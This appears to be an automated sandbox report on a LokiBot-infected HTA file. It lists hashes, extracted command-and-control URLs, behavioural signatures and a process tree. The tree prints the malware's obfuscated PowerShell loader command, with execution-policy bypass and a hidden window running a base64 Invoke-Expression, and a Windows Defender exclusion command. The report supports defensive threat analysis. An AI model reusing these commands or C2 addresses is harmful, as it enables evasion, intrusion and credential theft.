Analysis
max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
20-11-2024 10:02
Static task
static1
Behavioral task
behavioral1
Sample
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Resource
win10v2004-20241007-en
General
Target
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Size
23KB
MD5
ec0d423a3f72d69975a1e31a275f5377
SHA1
213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256
9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA512
8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
SSDEEP
96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
Lokibot family
Blocklisted process makes network request 1 IoCs
- flow 3, pid 2140, process poWERShell.eXe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- pid 524, process powershell.exe
Downloads MZ/PE file
Evasion via Device Credential Deployment 2 IoCs
- pid 2524, process powershell.exe
- pid 2140, process poWERShell.eXe
Executes dropped EXE 2 IoCs
- pid 2400, process wininit.exe
- pid 2416, process wininit.exe
Loads dropped DLL 3 IoCs
- pid 2140, process poWERShell.eXe (3 events)
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (wininit.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook (wininit.exe)
- Key opened: \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (wininit.exe)
Suspicious use of SetThreadContext 1 IoCs
- PID 2400 (wininit.exe) set thread context of 2416, procid_target 40
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cvtres.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (wininit.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (mshta.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (poWERShell.eXe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (csc.exe)
Modifies Internet Explorer settings 1 IoCs
- Key created: \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main (mshta.exe)
Suspicious behavior: EnumeratesProcesses 3 IoCs
- pid 2140, process poWERShell.eXe
- pid 2524, process powershell.exe
- pid 524, process powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
- Token: SeDebugPrivilege, pid 2140, process poWERShell.eXe
- Token: SeDebugPrivilege, pid 2524, process powershell.exe
- Token: SeDebugPrivilege, pid 524, process powershell.exe
- Token: SeDebugPrivilege, pid 2416, process wininit.exe
Suspicious use of WriteProcessMemory 34 IoCs
- PID 2736 (mshta.exe) wrote to memory of 2140, procid_target 30 (4 events)
- PID 2140 (poWERShell.eXe) wrote to memory of 2524, procid_target 32 (4 events)
- PID 2140 (poWERShell.eXe) wrote to memory of 1700, procid_target 33 (4 events)
- PID 1700 (csc.exe) wrote to memory of 480, procid_target 34 (4 events)
- PID 2140 (poWERShell.eXe) wrote to memory of 2400, procid_target 36 (4 events)
- PID 2400 (wininit.exe) wrote to memory of 524, procid_target 38 (4 events)
- PID 2400 (wininit.exe) wrote to memory of 2416, procid_target 40 (10 events)
outlook_office_path 1 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook (wininit.exe)
outlook_win_path 1 IoCs
- Key opened: \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook (wininit.exe)
Processes
(process tree; indentation shows parent/child depth)
C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\goodtoseeuthatgreatthingswithentirethingsgreatfor.hta"
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2736
  C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
    Command line: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'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'+[CHAR]0x22+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2140
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2524
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7hpqmqwi.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:1700
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CE7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6CE6.tmp"
        - System Location Discovery: System Language Discovery
        PID:480
    C:\Users\Admin\AppData\Roaming\wininit.exe
      Command line: "C:\Users\Admin\AppData\Roaming\wininit.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID:2400
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID:524
      C:\Users\Admin\AppData\Roaming\wininit.exe
        Command line: "C:\Users\Admin\AppData\Roaming\wininit.exe"
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
        PID:2416
Network
MITRE ATT&CK Enterprise v15
Downloads